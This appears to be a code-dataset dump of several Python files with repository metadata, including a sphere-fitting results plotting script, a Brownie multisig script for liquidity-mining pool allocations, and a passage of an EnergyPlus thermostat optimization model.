] | 1 | 2020-11-27T20:03:16.000Z | 2020-11-27T20:03:16.000Z | from .vcoclient import VcoClient | 32 | 32 | 0.875 | 4 | 32 | 7 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ae6d5ac57660ba795af491812a8e5d4fae7361f8 | 62 | py | Python | tests/tests_utilities/micro_mock.py | ComaszTyrulik/BasicCppSetupScripts | e221110de5e3fd9c173bda61e5eec46e9753ea17 | [
"MIT"
] | null | null | null | tests/tests_utilities/micro_mock.py | ComaszTyrulik/BasicCppSetupScripts | e221110de5e3fd9c173bda61e5eec46e9753ea17 | [
"MIT"
] | null | null | null | tests/tests_utilities/micro_mock.py | ComaszTyrulik/BasicCppSetupScripts | e221110de5e3fd9c173bda61e5eec46e9753ea17 | [
"MIT"
] | 1 | 2021-03-10T12:15:36.000Z | 2021-03-10T12:15:36.000Z | def MicroMock(**kwargs):
return type('Object', (), kwargs)()
| 20.666667 | 36 | 0.645161 | 7 | 62 | 5.714286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112903 | 62 | 2 | 37 | 31 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
ae86c07ed8e46ce20c4b5e5784c27e8c6da8b605 | 73 | py | Python | Deep_CNN_Project/hi.py | yjun1806/find_receipe | 8489fe8211de0fae96b9298fa4a435883cbd3da7 | [
"MIT"
] | null | null | null | Deep_CNN_Project/hi.py | yjun1806/find_receipe | 8489fe8211de0fae96b9298fa4a435883cbd3da7 | [
"MIT"
] | null | null | null | Deep_CNN_Project/hi.py | yjun1806/find_receipe | 8489fe8211de0fae96b9298fa4a435883cbd3da7 | [
"MIT"
] | null | null | null | import train_util
train_util.print_model_architecture('inception_v3')
| 12.166667 | 51 | 0.849315 | 10 | 73 | 5.7 | 0.8 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014925 | 0.082192 | 73 | 5 | 52 | 14.6 | 0.835821 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
888255e9ee3ca414acb23450fc6d33926fa4594a | 44 | py | Python | itscsapp/contact/models/__init__.py | danyRivC/itscsapp | 485309f41f477fcebf66899740a0b4a954f4b98b | [
"MIT"
] | null | null | null | itscsapp/contact/models/__init__.py | danyRivC/itscsapp | 485309f41f477fcebf66899740a0b4a954f4b98b | [
"MIT"
] | null | null | null | itscsapp/contact/models/__init__.py | danyRivC/itscsapp | 485309f41f477fcebf66899740a0b4a954f4b98b | [
"MIT"
] | null | null | null | from itscsapp.contact.models import contact
| 22 | 43 | 0.863636 | 6 | 44 | 6.333333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 44 | 1 | 44 | 44 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ee44935c916e0d7324603075e6ec821ad87a7177 | 11,499 | py | Python | test/sphere_performance_plots.py | jglrxavpok/shape-fitting | cf5a159f8bd97a30e2389b0ef2fe271f5a237685 | [
"MIT"
] | 3 | 2018-03-23T12:58:42.000Z | 2020-11-16T14:09:31.000Z | test/sphere_performance_plots.py | jglrxavpok/shape-fitting | cf5a159f8bd97a30e2389b0ef2fe271f5a237685 | [
"MIT"
] | null | null | null | test/sphere_performance_plots.py | jglrxavpok/shape-fitting | cf5a159f8bd97a30e2389b0ef2fe271f5a237685 | [
"MIT"
] | 3 | 2020-01-12T07:17:06.000Z | 2020-04-03T03:06:25.000Z | #
# Copyright (C) 2018 Rui Pimentel de Figueiredo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# \author Rui Figueiredo : ruipimentelfigueiredo
#
#! /usr/bin/env python
import matplotlib.pyplot as plt
from matplotlib.ticker import FuncFormatter
from os import path
#plt.rc('text', usetex=True)
import numpy as np
import math
home=path.expanduser('~/ws/src/shape_detection_fitting/lib/')
def to_percent(y, position):
# Ignore the passed in position. This has the effect of scaling the default
# tick locations.
s = str(100 * y)
# The percent symbol needs escaping in latex
if plt.rcParams['text.usetex'] is True:
return s #+ r'$\%$'
else:
return s #+ '%'
radii=1
iterations=500
ground_truth_size=radii
outlier_levels=1
noise_levels_number=11
noise_index=0
outlier_index=0
occlusion_index=0
alpha_=0.1
fontsize_=20
error_levels=[0,5,10,15,20,25,30,35,40,45,50]
noise_levels_number=len(error_levels)
#outlier_levels_=[0,25,50,75,100,125,150,175,200]
outlier_levels_=[0.0]
occlusion_levels_=[0.0]
occlusion_levels_number=1
colors=['green','blue','red','black']
labels=['Ours (Unbiased)','Ours (Unbiased and soft-voting)','Ours (Weak Vertical-Bias)','Ours (Weak Vertical-Bias and soft-voting)','Ours (Strong Vertical-Bias)','Ours (Strong Vertical-Bias and soft-voting)']
linestyles = ['-', '--']
linethickness=[1, 2, 3, 4, 5]
#POSITION
hough_position_results_0=[]
hough_position_results_1=[]
hough_position_results_2=[]
hough_position_results_3=[]
hough_position_file_0 = open(home + "shape-fitting/dataset/sphere/results/position_noise_0.txt", "r")
hough_position_file_1 = open(home + "shape-fitting/dataset/sphere/results/position_noise_1.txt", "r")
for line in hough_position_file_0:
hough_position_results_0.append(float(line))
hough_position_results_0 = np.array(hough_position_results_0).reshape(iterations,outlier_levels,occlusion_levels_number,ground_truth_size,noise_levels_number)
for line in hough_position_file_1:
hough_position_results_1.append(float(line))
hough_position_results_1 = np.array(hough_position_results_1).reshape(iterations,outlier_levels,occlusion_levels_number,ground_truth_size,noise_levels_number)
#RADIUS
hough_radius_results_0=[]
hough_radius_results_1=[]
hough_radius_results_2=[]
hough_radius_results_3=[]
hough_radius_file_0 = open(home + "shape-fitting/dataset/sphere/results/radius_noise_0.txt", "r")
hough_radius_file_1 = open(home + "shape-fitting/dataset/sphere/results/radius_noise_1.txt", "r")
for line in hough_radius_file_0:
hough_radius_results_0.append(float(line))
hough_radius_results_0 = np.array(hough_radius_results_0).reshape(iterations,outlier_levels,occlusion_levels_number,ground_truth_size,noise_levels_number)
for line in hough_radius_file_1:
hough_radius_results_1.append(float(line))
hough_radius_results_1 = np.array(hough_radius_results_1).reshape(iterations,outlier_levels,occlusion_levels_number,ground_truth_size,noise_levels_number)
# compute position average and standard deviation
hough_position_results_mean_0 = np.mean(hough_position_results_0, axis=(0,3))
hough_position_results_std_0 = np.std(hough_position_results_0, axis=(0,3))
hough_position_results_mean_1 = np.mean(hough_position_results_1, axis=(0,3))
hough_position_results_std_1 = np.std(hough_position_results_1, axis=(0,3))
# compute radius average and standard deviation
hough_radius_results_mean_0 = np.mean(hough_radius_results_0, axis=(0,3))
hough_radius_results_std_0 = np.std(hough_radius_results_0, axis=(0,3))
hough_radius_results_mean_1 = np.mean(hough_radius_results_1, axis=(0,3))
hough_radius_results_std_1 = np.std(hough_radius_results_1, axis=(0,3))
### Plots (noise)
### Position
plt.figure(figsize=(8, 6))
plt.plot(error_levels,hough_position_results_mean_0[outlier_index,occlusion_index,:],color=colors[0],label=labels[0],linestyle=linestyles[1])
error_sup=hough_position_results_mean_0[outlier_index,occlusion_index,:]+hough_position_results_std_0[outlier_index,occlusion_index,:];
error_inf=hough_position_results_mean_0[outlier_index,occlusion_index,:]-hough_position_results_std_0[outlier_index,occlusion_index,:];
plt.fill_between(error_levels,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
plt.plot(error_levels,hough_position_results_mean_1[outlier_index,occlusion_index,:],color=colors[0],label=labels[1],linestyle=linestyles[0])
error_sup=hough_position_results_mean_1[outlier_index,occlusion_index,:]+hough_position_results_std_1[outlier_index,occlusion_index,:];
error_inf=hough_position_results_mean_1[outlier_index,occlusion_index,:]-hough_position_results_std_1[outlier_index,occlusion_index,:];
plt.fill_between(error_levels,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('noise standard deviation [% of sphere radius]',fontsize=fontsize_)
plt.ylabel('absolute position error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
#plt.show()
plt.legend(fontsize=fontsize_)
plt.savefig('noise_position_error.pdf',format='pdf')
### Radius
plt.figure(figsize=(8, 6))
plt.plot(error_levels,hough_radius_results_mean_0[outlier_index,occlusion_index,:],color=colors[0],label=labels[0],linestyle=linestyles[1])
error_sup=hough_radius_results_mean_0[outlier_index,occlusion_index,:]+hough_radius_results_std_0[outlier_index,occlusion_index,:];
error_inf=hough_radius_results_mean_0[outlier_index,occlusion_index,:]-hough_radius_results_std_0[outlier_index,occlusion_index,:];
plt.fill_between(error_levels,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
plt.plot(error_levels,hough_radius_results_mean_1[outlier_index,occlusion_index,:],color=colors[0],label=labels[1],linestyle=linestyles[0])
error_sup=hough_radius_results_mean_1[outlier_index,occlusion_index,:]+hough_radius_results_std_1[outlier_index,occlusion_index,:];
error_inf=hough_radius_results_mean_1[outlier_index,occlusion_index,:]-hough_radius_results_std_1[outlier_index,occlusion_index,:];
plt.fill_between(error_levels,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('noise standard deviation [% of sphere radius]',fontsize=fontsize_)
plt.ylabel('absolute radius error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
#plt.show()
plt.savefig('noise_radius_error.pdf',format='pdf')
### Plots (outliers)
### Position
plt.figure(figsize=(8, 6))
plt.plot(outlier_levels_,hough_position_results_mean_0[:,occlusion_index,noise_index],color=colors[0],label=labels[0],linestyle=linestyles[1])
error_sup=hough_position_results_mean_0[:,occlusion_index,noise_index]+hough_position_results_std_0[:,occlusion_index,noise_index];
error_inf=hough_position_results_mean_0[:,occlusion_index,noise_index]-hough_position_results_std_0[:,occlusion_index,noise_index];
plt.fill_between(outlier_levels_,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
plt.plot(error_levels,hough_radius_results_mean_1[:,occlusion_index,noise_index],color=colors[0],label=labels[1],linestyle=linestyles[0])
error_sup=hough_radius_results_mean_1[:,occlusion_index,noise_index]+hough_radius_results_std_1[:,occlusion_index,noise_index];
error_inf=hough_radius_results_mean_1[:,occlusion_index,noise_index]-hough_radius_results_std_1[:,occlusion_index,noise_index];
plt.fill_between(error_levels,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('outliers [% of sphere surface points]',fontsize=fontsize_)
plt.ylabel('absolute position error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
plt.legend(fontsize=fontsize_)
plt.savefig('outliers_position_error.pdf',format='pdf')
### Radius
plt.figure(figsize=(8, 6))
plt.plot(outlier_levels_,hough_radius_results_mean_0[:,occlusion_index,noise_index],color=colors[0],label=labels[0],linestyle=linestyles[1])
error_sup=hough_radius_results_mean_0[:,occlusion_index,noise_index]+hough_radius_results_std_0[:,occlusion_index,noise_index];
error_inf=hough_radius_results_mean_0[:,occlusion_index,noise_index]-hough_radius_results_std_0[:,occlusion_index,noise_index];
plt.fill_between(outlier_levels_,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('outliers [% of sphere surface points]',fontsize=fontsize_)
plt.ylabel('absolute radius error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
plt.legend(fontsize=fontsize_)
plt.savefig('outliers_radius_error.pdf',format='pdf')
### Plots (occlusion)
### Position
plt.figure(figsize=(8, 6))
plt.plot(occlusion_levels_,hough_position_results_mean_0[outlier_index,:,noise_index],color=colors[0],label=labels[0])
error_sup=hough_position_results_mean_0[outlier_index,:,noise_index]+hough_position_results_std_0[outlier_index,:,noise_index];
error_inf=hough_position_results_mean_0[outlier_index,:,noise_index]-hough_position_results_std_0[outlier_index,:,noise_index];
plt.fill_between(occlusion_levels_,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('outliers [% of sphere surface points]',fontsize=fontsize_)
plt.ylabel('absolute position error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
plt.legend(fontsize=fontsize_)
plt.savefig('occlusion_position_error.pdf',format='pdf')
### Radius
plt.figure(figsize=(8, 6))
plt.plot(occlusion_levels_,hough_radius_results_mean_0[outlier_index,:,noise_index],color=colors[0],label=labels[0])
error_sup=hough_radius_results_mean_0[outlier_index,:,noise_index]+hough_radius_results_std_0[outlier_index,:,noise_index];
error_inf=hough_radius_results_mean_0[outlier_index,:,noise_index]-hough_radius_results_std_0[outlier_index,:,noise_index];
plt.fill_between(occlusion_levels_,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('outliers [% of sphere surface points]',fontsize=fontsize_)
plt.ylabel('absolute radius error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
plt.legend(fontsize=fontsize_)
plt.savefig('occlusion_radius_error.pdf',format='pdf')
plt.show()
| 46.743902 | 208 | 0.814419 | 1,761 | 11,499 | 4.961386 | 0.128904 | 0.059174 | 0.088589 | 0.059517 | 0.816527 | 0.783221 | 0.739499 | 0.721873 | 0.714776 | 0.680783 | 0 | 0.021412 | 0.057744 | 11,499 | 245 | 209 | 46.934694 | 0.784956 | 0.096182 | 0 | 0.379085 | 0 | 0 | 0.102023 | 0.039977 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006536 | false | 0 | 0.03268 | 0 | 0.052288 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ee5f80a2b7b1a955e1a677bde04a9cee64029dc5 | 4,187 | py | Python | scripts/deployment/liquidity-mining/addETHPoolToken.py | spiyer99/Sovryn-smart-contracts | f0d5059f0e71096801683f3fe310d262b27c5997 | [
"Apache-2.0"
] | 1 | 2021-06-07T17:12:56.000Z | 2021-06-07T17:12:56.000Z | scripts/deployment/liquidity-mining/addETHPoolToken.py | 1Crazymoney/Sovryn-smart-contracts | 308e7a82f857a8dbb0f7e789717de33be08189ec | [
"Apache-2.0"
] | null | null | null | scripts/deployment/liquidity-mining/addETHPoolToken.py | 1Crazymoney/Sovryn-smart-contracts | 308e7a82f857a8dbb0f7e789717de33be08189ec | [
"Apache-2.0"
] | null | null | null |
'''
This script serves the purpose of interacting with existing smart contracts on the testnet or mainnet.
'''
from brownie import *
from brownie.network.contract import InterfaceContainer
import json
import time;
import copy
def main():
#load the contracts and acct depending on the network
loadConfig()
#call the function you want here
# addTestETHPoolToken()
# addETHPoolToken()
updatePoolToken()
def loadConfig():
global contracts, acct
thisNetwork = network.show_active()
if thisNetwork == "development":
acct = accounts[0]
configFile = open('./scripts/contractInteraction/testnet_contracts.json')
elif thisNetwork == "testnet":
acct = accounts.load("rskdeployer")
configFile = open('./scripts/contractInteraction/testnet_contracts.json')
elif thisNetwork == "rsk-testnet":
acct = accounts.load("rskdeployer")
configFile = open('./scripts/contractInteraction/testnet_contracts.json')
elif thisNetwork == "rsk-mainnet":
acct = accounts.load("rskdeployer")
configFile = open('./scripts/contractInteraction/mainnet_contracts.json')
else:
raise Exception("Network not supported.")
contracts = json.load(configFile)
def addTestETHPoolToken():
multisig = Contract.from_abi("MultiSig", address=contracts['multisig'], abi=MultiSigWallet.abi, owner=acct)
lm = Contract.from_abi("LiquidityMining", address = contracts['LiquidityMiningProxy'], abi = LiquidityMining.abi, owner = acct)
data = lm.add.encode_input(contracts['(WR)BTC/ETH'],1,False)
tx = multisig.submitTransaction(lm.address,0,data)
txId = tx.events["Submission"]["transactionId"]
print("txid",txId)
def addETHPoolToken():
multisig = Contract.from_abi("MultiSig", address=contracts['multisig'], abi=MultiSigWallet.abi, owner=acct)
lm = Contract.from_abi("LiquidityMining", address = contracts['LiquidityMiningProxy'], abi = LiquidityMining.abi, owner = acct)
MAX_ALLOCATION_POINT = 100000 * 1000 # 100 M
ALLOCATION_POINT_BTC_SOV = 40000 # (WR)BTC/SOV
ALLOCATION_POINT_BTC_ETH = 1 # or 30000 (WR)BTC/ETH
ALLOCATION_POINT_DEFAULT = 1 # (WR)BTC/USDT1 | (WR)BTC/USDT2 | (WR)BTC/DOC1 | (WR)BTC/DOC2 | (WR)BTC/BPRO1 | (WR)BTC/BPRO2
ALLOCATION_POINT_CONFIG_TOKEN = MAX_ALLOCATION_POINT - ALLOCATION_POINT_BTC_SOV - ALLOCATION_POINT_BTC_ETH - ALLOCATION_POINT_DEFAULT * 6
print("ALLOCATION_POINT_CONFIG_TOKEN: ", ALLOCATION_POINT_CONFIG_TOKEN)
data = lm.add.encode_input(contracts['(WR)BTC/ETH'],ALLOCATION_POINT_BTC_ETH,False)
tx = multisig.submitTransaction(lm.address,0,data)
txId = tx.events["Submission"]["transactionId"]
print("txid",txId)
data = lm.update.encode_input(contracts['LiquidityMiningConfigToken'],ALLOCATION_POINT_CONFIG_TOKEN,True)
tx = multisig.submitTransaction(lm.address,0,data)
txId = tx.events["Submission"]["transactionId"]
print("txid",txId)
def updatePoolToken():
multisig = Contract.from_abi("MultiSig", address=contracts['multisig'], abi=MultiSigWallet.abi, owner=acct)
lm = Contract.from_abi("LiquidityMining", address = contracts['LiquidityMiningProxy'], abi = LiquidityMining.abi, owner = acct)
MAX_ALLOCATION_POINT = 100000 * 1000 # 100 M
ALLOCATION_POINT_BTC_SOV = 30000 # (WR)BTC/SOV
ALLOCATION_POINT_BTC_ETH = 35000 # (WR)BTC/ETH
ALLOCATION_POINT_DEFAULT = 1 # (WR)BTC/USDT1 | (WR)BTC/USDT2 | (WR)BTC/DOC1 | (WR)BTC/DOC2 | (WR)BTC/BPRO1 | (WR)BTC/BPRO2
ALLOCATION_POINT_CONFIG_TOKEN = MAX_ALLOCATION_POINT - ALLOCATION_POINT_BTC_SOV - ALLOCATION_POINT_BTC_ETH - ALLOCATION_POINT_DEFAULT * 6
print("ALLOCATION_POINT_CONFIG_TOKEN: ", ALLOCATION_POINT_CONFIG_TOKEN)
data = lm.update.encode_input(contracts['(WR)BTC/SOV'],ALLOCATION_POINT_BTC_SOV,False)
tx = multisig.submitTransaction(lm.address,0,data)
txId = tx.events["Submission"]["transactionId"]
print("txid",txId)
data = lm.update.encode_input(contracts['LiquidityMiningConfigToken'],ALLOCATION_POINT_CONFIG_TOKEN,True)
tx = multisig.submitTransaction(lm.address,0,data)
txId = tx.events["Submission"]["transactionId"]
print("txid",txId)
| 44.542553 | 141 | 0.729162 | 498 | 4,187 | 5.957831 | 0.214859 | 0.131446 | 0.060667 | 0.070104 | 0.800472 | 0.795416 | 0.77789 | 0.758342 | 0.73576 | 0.687563 | 0 | 0.019646 | 0.149033 | 4,187 | 93 | 142 | 45.021505 | 0.813079 | 0.114402 | 0 | 0.552239 | 0 | 0 | 0.200108 | 0.086768 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074627 | false | 0 | 0.074627 | 0 | 0.149254 | 0.104478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ee6160f62e8f157321dea49505c25b6606d7b0cb | 44,090 | py | Python | Chapter4/Python Code/SOProblems_OT.py | kadenP/TheRoleOfBuildingsInAChangingEnvironmentalEra_PleweMSThesis | e8a8420f51d852ad48125d600c1527e923f0a4e7 | [
"MIT"
] | null | null | null | Chapter4/Python Code/SOProblems_OT.py | kadenP/TheRoleOfBuildingsInAChangingEnvironmentalEra_PleweMSThesis | e8a8420f51d852ad48125d600c1527e923f0a4e7 | [
"MIT"
] | null | null | null | Chapter4/Python Code/SOProblems_OT.py | kadenP/TheRoleOfBuildingsInAChangingEnvironmentalEra_PleweMSThesis | e8a8420f51d852ad48125d600c1527e923f0a4e7 | [
"MIT"
] | null | null | null | '''
Kaden Plewe
3/5/2019
Optimization Model for SEB Single Thermal Zone Building
This will define an optimization problem based on the small office EnergyPlus model. It will be passed into
the optimization algorithm directly.
idf location: C:\Users\Owner\OneDrive\Research\Masters Thesis\Open Studio\Building Models
idd location: C:\EnergyPlusV8-5-0\Energy+.idd
eppy location: C:\Users\Owner\Anaconda3\Lib\site-packages\eppy
'''
'''import libraries'''
from SmallOfficeModules import configuresmalloffice, smallofficeoutputs
from eppy.modeleditor import IDF
import eppy.json_functions as json_functions
import os
import json
import csv
from collections import defaultdict
import numpy as np
from platypus import Problem, Real
import random
# OptCS = "global"; OptCS = []; OptHS = "global"; OptHS = []
'''parameter set used to apply uncertainty'''
# with open('jsonOUTPUT_PMVOpt10.txt') as jsonParams:
# paramSet = json.load(jsonParams)
paramSet = {'input': []}
'''optimization problem for hour 1 of 24'''
class SO1(Problem):
def __init__(self, Begin_Month, Begin_Day_of_Month, End_Month, End_Day_of_Month):
'''define SEB problem as having 30 decision variables (Space Thermostat HTG and CLG Setpoint), 2 objective
(HVAC Demand + PMV) and 48 constraints (PMV values and derivatives)'''
super(SO1, self).__init__(48, 3, 48)
'''define the two decision variables as real values with limited ranges
30 total variables for heating and cooling setpoints for a 24 hour period'''
self.types[:] = [Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30),
Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30),
Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30),
Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30), Real(23.5, 30),
Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23),
Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23),
Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23),
Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23), Real(15.5, 23)]
'''define the types of constraints that will be used in the problem definition'''
self.constraints[:] = "<=0"
'''introduce the necessary files for the building simulation'''
self.iddfile = "C:\EnergyPlusV8-5-0\Energy+.idd"
self.fname = "SmallOffice.idf"
self.weatherfile = "USA_MI_Lansing-Capital.City.AP.725390_TMY3.epw"
'''initialize idf file'''
IDF.setiddname(self.iddfile)
self.idfdevice = IDF(self.fname, self.weatherfile)
'''initialize idf file for specified outputs and simulation period'''
'''update the run period fields'''
for object in self.idfdevice.idfobjects['RUNPERIOD']:
object.Begin_Month = Begin_Month
object.Begin_Day_of_Month = Begin_Day_of_Month
object.End_Month = End_Month
object.End_Day_of_Month = End_Day_of_Month
'''update the simulation control variables'''
for object in self.idfdevice.idfobjects['SIMULATIONCONTROL']:
object.Do_Zone_Sizing_Calculation = 'Yes'
object.Do_System_Sizing_Calculation = 'Yes'
object.Do_Plant_Sizing_Calculation = 'Yes'
object.Run_Simulation_for_Sizing_Periods = 'No'
object.Run_Simulation_for_Weather_File_Run_Periods = 'Yes'
print('=== Sumulation Control Parameters Changed ===')
'''add thermal comfort model to people objects'''
for object in self.idfdevice.idfobjects['PEOPLE']:
object.Surface_NameAngle_Factor_List_Name = ''
object.Work_Efficiency_Schedule_Name = 'WORK_EFF_SCH'
object.Clothing_Insulation_Schedule_Name = 'CLOTHING_SCH'
object.Air_Velocity_Schedule_Name = 'AIR_VELO_SCH'
object.Thermal_Comfort_Model_1_Type = 'Fanger'
'''Fanger PMV thermal comfort model (Zone Average)'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Zone Thermal Comfort Fanger Model PMV'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Fanger PPD thermal comfort model (Zone Average)'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Zone Thermal Comfort Fanger Model PPD'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Total Purchase Electric Energy [J]'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Facility Total Purchased Electric Energy'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Total HVAC Demand [W]'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Facility Total HVAC Electric Demand Power'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Hourly cooling temperature setpoint [°C]'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Zone Thermostat Cooling Setpoint Temperature'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Hourly heating temperature setpoint [°C]'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Zone Thermostat Heating Setpoint Temperature'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Zone thermostat air temperature [°C]'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Zone Thermostat Air Temperature'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
def evaluate(self, solution):
self.CSP1 = solution.variables[0]
self.CSP2 = solution.variables[1]
self.CSP3 = solution.variables[2]
self.CSP4 = solution.variables[3]
self.CSP5 = solution.variables[4]
self.CSP6 = solution.variables[5]
self.CSP7 = solution.variables[6]
self.CSP8 = solution.variables[7]
self.CSP9 = solution.variables[8]
self.CSP10 = solution.variables[9]
self.CSP11 = solution.variables[10]
self.CSP12 = solution.variables[11]
self.CSP13 = solution.variables[12]
self.CSP14 = solution.variables[13]
self.CSP15 = solution.variables[14]
self.CSP16 = solution.variables[15]
self.CSP17 = solution.variables[16]
